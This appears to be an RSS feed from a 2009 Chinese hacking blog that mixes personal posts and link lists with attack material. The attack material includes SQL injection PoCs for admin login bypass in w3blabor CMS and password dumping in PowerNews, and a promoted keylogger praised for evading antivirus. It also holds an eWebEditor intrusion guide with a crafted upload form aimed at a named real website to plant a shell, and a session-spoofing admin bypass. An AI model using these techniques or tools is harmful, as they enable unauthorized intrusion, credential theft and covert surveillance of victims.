<![CDATA[黑海洋's BLOG]]> http://www.upx8.com/ zh-cn PBlog2 v2.4 黑海洋's BLOG http://www.upx8.com/images/logos.gif http://www.upx8.com/ 黑海洋's BLOG http://www.upx8.com/article.asp?id=332 <![CDATA[经典网页设计网站站点大全]]> tzsm11@163.com(admin) Sun,04 Jan 2009 15:09:37 +0800 http://www.upx8.com/default.asp?id=332
蓝色理想 http://www.blueidea.com
网页设计师联盟 http://www.68design.net
网页设计大本营 http://www.code-123.com
我爱设计网 http://www.52design.com
视觉中国 http://www.chinavisual.com
设计在线 http://www.dolcn.com
网易学院 http://tech.163.com/school
天极设计在线 http://art.yesky.com

二、图象处理类

设计中国(中国PHOTOSHOP联盟) http://www.chinaddu.com
图像谷 http://www.pstxg.com

三、动画设计类

闪客帝国 http://www.flashempire.com
闪吧 http://www.flash8.net
闪盟在线 http://www.flashsun.com

四、网页素材类

桌面城市 http://www.deskcity.com
素材精品屋 http://www.sucaiw.com
站酷(ZCOOL) http://www.zcool.com.cn
E库素材 http://www.iecool.com
中国站长素材 http://sc.chinaz.com

五、程序开发类

CSDN开发者网络 http://www.csdn.net
MSDN 中文网站 http://msdn.microsoft.com/zh-cn/default.aspx
动网先锋 http://www.cndw.com
编程中国 http://www.bc-cn.net

六:网站源码类

代码中国 http://download.csdn.net
天新网源码下载 http://www.21tx.com/src
源码之家 http://www.mycodes.net
站长下载 http://down.chinaz.com]]> http://www.upx8.com/article.asp?id=331 <![CDATA[1000M免费全能空间【留言申请】]]> tzsm11@163.com(admin) Sat,03 Jan 2009 20:25:21 +0800 http://www.upx8.com/default.asp?id=331 功能:

空间容量:1000M

格式:PHP ASP .NET CGI SQL

速度:10M电信独立宽带

-----------------------------

  • 申请格式:

    需要解析的域名:www.xxx.com

    需要设置的ID和密码:发到tzsm11@qq.com

    -----------------------------

    留言先得.
    • ]]>         http://www.upx8.com/article.asp?id=330 <![CDATA[w3blabor CMS <= 3.3.0]]> tzsm11@163.com(admin) Sat,03 Jan 2009 19:27:45 +0800 http://www.upx8.com/default.asp?id=330 [!] Vendor.....: http://www.w3blaborcms.de
    [!] Detected...: 20.12.2008
    [!] Reported...: 20.12.2008
    [!] Response...: 21.12.2008

    [!] Background.: Sicher! Schnell! Einfach!
                     Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
                     abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
                     angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
                     Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
                     es zu etwas Besonderem!

    [!] Bug........: $_POST['benutzername'] & $_POST['passwort'] in admin/index.php near line 93

                      93: if (isset($_GET['action']) && $_GET['action'] == "login" && $_POST['benutzername'] != "" && $_POST['passwort'] != "") {
                      94:
                      95:    $check = mysql_fetch_assoc(mysql_query("Select * FROM admin Where benutzername='".$_POST['benutzername']."'"));
                      96:
                      97:    if ($check['benutzername'] == "") {
                      98:
                      99:        $_SESSION['login'] = false;
                     100:        header("Location: index.php?fehler=error001");
                     101:        exit;
                     102:
                     103:    } else {
                     104:
                     105:        $md5pw = md5($_POST['passwort']);
                     106:
                     107:        $check = mysql_fetch_assoc(mysql_query("Select * FROM admin Where benutzername='".$_POST['benutzername']."' AND passwort='".$md5pw."'"));

    [!] PoC........: To bypass the admin login:

                     Username: x' or 1=1/*
                     Password: not empty

    [!] Solution...: upgrade to version 3.4.0]]>         http://www.upx8.com/article.asp?id=329 <![CDATA[PowerNews 2.5.4 ]]> tzsm11@163.com(admin) Sat,03 Jan 2009 19:22:22 +0800 http://www.upx8.com/default.asp?id=329 www.virangar.net
    --------
    Discoverd By :virangar security team(hadihadi)
    special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
    & all virangar members & all hackerz
    greetz:to my best friend in the world hadi_aryaie2004
    & my lovely friend arash(imm02tal)
    -------
    exploit:
    http://site.com/news.php?newsid='/**/union/**/select/**/1,2,3,4,concat(nickname,0x3e,password),6,7,8,9/**/from/**/pn_users/*
    ----
    young iranian h4ck3rz]]>         http://www.upx8.com/article.asp?id=328 <![CDATA[Sprinder V1.4a【附-Delphi 源代码】]]> tzsm11@163.com(admin) Sat,03 Jan 2009 17:05:19 +0800 http://www.upx8.com/default.asp?id=328
    好像没什么好介绍的.

    下载文件 下载此文件
    ]]>         http://www.upx8.com/article.asp?id=327 <![CDATA[没资本就不要装逼]]> tzsm11@163.com(admin) Fri,02 Jan 2009 22:53:46 +0800 http://www.upx8.com/default.asp?id=327
    有些人他妈的说什么RT,UB,只要你说的他都懂,你说他不懂,他还来劲了跟你挣,悲哀啊.

    不知道就要虚心求教,少他妈的装。

    真TMD不想拆穿他,哎,只好配合他.(谁叫咱人好呢)

    像我溢出技术理论不懂,我就他妈敢承认,虚心求教百度。

    下次要是再他妈的让我碰到,直接枪毙.]]>         http://www.upx8.com/article.asp?id=326 <![CDATA[银泰人如潮水]]> tzsm11@163.com(admin) Thu,01 Jan 2009 22:26:34 +0800 http://www.upx8.com/default.asp?id=326
    今天就冲这银泰打折去的,
    打折如下:

    400减160
    400减260
    500减330
    1000减660


    我和室友进去之后,看到的那是400减260 500减330 1000减660 啊,除了垃圾牌子(都没听过,可能我农民吧),其他的都是400减160.

    逛着逛着久失去了兴趣,索性出去到外面看看,等下楼的时咋一看(晕.都是人),进来时可能没注意。

    又是一次没实际性的打折......]]>         http://www.upx8.com/article.asp?id=325 <![CDATA[Spytector 1.3.7【键盘记录】]]> tzsm11@163.com(admin) Thu,01 Jan 2009 21:25:51 +0800 http://www.upx8.com/default.asp?id=325
    易与做免杀(至少你现在用Spytector 1.3.7生成一个Server.exe,不用做免杀它也过瑞星)。

    这款工具总体说不错,支持EMAIL,FTP等收信方式,内置下载者等功能.
    Spytector监控你电脑上的所有动作,它具备一套过滤器和高级防火墙技术,能够监测包括e-mail、FTP、剪贴版等等,并记录下来。所以,它能够发现某些无法预知的间谍软件(后门程序和蠕虫木马等)活动而导致的不良后果。
    Spytector不会因为记录系统信息而使你的隐私暴露,相反,它还会对这些记录信息进行加密存储。一般的用户从任务管理器无法发现它的行踪,并且占用资源仅有30kb,适用于内存小、CPU慢的低配置用户。(SINA)



    官方:http://www.spytector.com

    下载文件 下载此文件
    ]]>         http://www.upx8.com/article.asp?id=323 <![CDATA[boardspy v.0.1+源代码【VB】]]> tzsm11@163.com(admin) Thu,01 Jan 2009 20:50:12 +0800 http://www.upx8.com/default.asp?id=323
    程序代码 程序代码
    用法:
    boardspy.exe <setting1> <setting2> <setting3>...

    设置:
    -url <target url (ROOT Directory of Board!)>

    例如:
    boardspy.exe -url "http://bbs.upx8.com/"


    例如:

    程序代码 程序代码
    P:\boardspy>boardspy.exe -url "http://bbs.upx8.com/"

    [+] Checking...     //检测
    [+] Done, needed 2 secs     //完成时限

    [+] Success: vBulletin 3.7.2     //成功
            

    下载文件 点击下载此文件
    ]]>         http://www.upx8.com/article.asp?id=319 <![CDATA[浅析Webedit在线编辑器的入侵]]> tzsm11@163.com(admin) Thu,01 Jan 2009 19:09:43 +0800 http://www.upx8.com/default.asp?id=319 默认的后台路径是admin/admin_login.asp
    有的时候管理员修改为asp、asa,可以插入一句话
    有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的后缀样式表,直接利用上传,具体看完文章我想大家都有个全新的认识了
    还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的
    例如:db/#ewebeditor.asa、db/#ewebeditor.asp
    有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
    简单利用就是
    http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
    http://www.siqinci.com/ewebedito ... amp;style=full_v200
    可以利用nbsi进行猜解,对此进行注入
    还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
    这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:



    <script language=javascript>parent.UploadError('无效的样式ID号,请通过页面上的链接进行操作!');history.back()</script>
    <HTML>
    <HEAD>
    <TITLE>文件上传</TITLE>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <style type="text/css">
    body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}
    body {padding:0px;margin:0px}
    </style>
    <script language="JavaScript" src="dialog/dialog.js"></script>
    </head>
    <body bgcolor=menu>
    <form http://www.golden-victory.com/ew ... &style=s_poppop">http://www.golden-victory.com/ewebeditor/upload.asp?action=save&type=image&style=s_poppop" method=post name=myform enctype="multipart/form-data">
    <input type=file name=uploadfile size=1 style="width:100%">
    <input type=submit name=uploadfile value=上传></input>
    </form>
    <script language=javascript>
    var sAllowExt = "";
    // 检测上传表单
    function CheckUploadForm() {
    if (!IsExt(document.myform.uploadfile.value,sAllowExt)){
      parent.UploadError("提示:\n\n请选择一个有效的文件,\n支持的格式有("+sAllowExt+")!");
      return false;
    }
    return true
    }
    // 提交事件加入检测表单
    var oForm = document.myform ;
    oForm.attachEvent("onsubmit", CheckUploadForm) ;
    if (! oForm.submitUpload) oForm.submitUpload = new Array() ;
    oForm.submitUpload[oForm.submitUpload.length] = CheckUploadForm ;
    if (! oForm.originalSubmit) {
    oForm.originalSubmit = oForm.submit ;
    oForm.submit = function() {
      if (this.submitUpload) {
      for (var i = 0 ; i < this.submitUpload.length ; i++) {
        this.submitUpload() ;
      }
      }
      this.originalSubmit() ;
    }
    }
    // 上传表单已装入完成
    try {
    parent.UploadLoaded();
    }
    catch(e){
    }
    </script>
    </body>
    </html>

    还有种方式是最近坏客发现的
    利用WebEditor session欺骗漏洞,进入后台:
    漏洞文件:Admin_Private.asp
    漏洞语句:<%

    If Session("eWebEditor_User") = "" Then
    Response.Redirect "admin_login.asp"
    Response.End
    End If

    只判断了session,没有判断cookies和路径的验证问题。
    漏洞利用:
    新建一个amxking.asp内容如下:
    <%Session("eWebEditor_User") = "11111111"%>
    访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp ]]>